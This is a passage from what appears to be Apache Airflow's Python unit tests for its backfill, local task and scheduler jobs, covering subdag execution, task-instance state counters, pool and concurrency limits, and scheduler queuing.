for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
)
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True
)
job.run()
session = settings.Session()
tis = session.query(TI).filter(
TI.dag_id == 'test_start_date_scheduling' and TI.task_id == 'dummy'
).order_by(TI.execution_date).all()
queued_times = [ti.queued_dttm for ti in tis]
self.assertTrue(queued_times == sorted(queued_times, reverse=True))
self.assertTrue(all([ti.state == State.SUCCESS for ti in tis]))
dag.clear()
session.close()
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
clear_db_runs()
clear_db_pools()
clear_db_dags()
clear_db_sla_miss()
clear_db_errors()
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag()
def getboolean(section, key):
if section.lower() == 'core' and key.lower() == 'load_examples':
return False
else:
return configuration.conf.getboolean(section, key)
cls.patcher = mock.patch('airflow.jobs.conf.getboolean')
mock_getboolean = cls.patcher.start()
mock_getboolean.side_effect = getboolean
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
assert mock_queue_command.called
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
